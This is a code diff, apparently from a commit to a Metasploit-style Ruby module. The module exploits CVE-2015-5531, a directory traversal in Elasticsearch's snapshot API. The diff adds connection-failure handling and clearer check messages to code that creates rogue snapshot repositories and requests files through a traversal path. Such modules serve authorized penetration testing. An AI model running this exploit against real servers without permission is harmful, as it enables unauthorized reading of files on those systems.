@@ -54,17 +54,21 @@ def check_host(ip)
5454 'data' => '{"type":"fs","settings":{"location":"dsr"}}'
5555 )
5656
57+ return Exploit ::CheckCode ::Unknown ( 'Failed to connect to the target.' ) unless res1
58+
5759 res2 = send_request_raw (
5860 'method' => 'POST' ,
5961 'uri' => normalize_uri ( target_uri . path , '_snapshot' , 'pwnie' ) ,
6062 'data' => '{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}'
6163 )
6264
65+ return Exploit ::CheckCode ::Unknown ( 'Failed to connect to the target.' ) unless res2
66+
6367 if res1 . body . include? ( 'true' ) && res2 . body . include? ( 'true' )
64- return Exploit ::CheckCode ::Appears
68+ return Exploit ::CheckCode ::Appears ( 'Successfully created snapshot repositories, suggesting the Snapshot API is vulnerable to CVE-2015-5531.' )
6569 end
6670
67- Exploit ::CheckCode ::Safe
71+ Exploit ::CheckCode ::Safe ( 'Failed to create snapshot repositories.' )
6872 end
6973
7074 def read_file ( file )
@@ -82,7 +86,12 @@ def read_file(file)
8286 'uri' => travs
8387 )
8488
85- if res && res . code == 400
89+ unless res
90+ print_error ( "No response received from the target." )
91+ return nil
92+ end
93+
94+ if res . code == 400
8695 return res . body
8796 else
8897 print_status ( "Server returned HTTP response code: #{ res . code } )
@@ -95,8 +104,8 @@ def run_host(ip)
95104 vprint_status ( "Checking if it's a vulnerable ElasticSearch" )
96105
97106 check_code = check_host ( ip )
98- print_status ( " #{ check_code . message } " )
99- if check_host ( ip ) ! = Exploit ::CheckCode ::Appears
107+ print_status ( check_code . message )
108+ unless check_code = = Exploit ::CheckCode ::Appears
100109 return
101110 end
102111
0 commit comments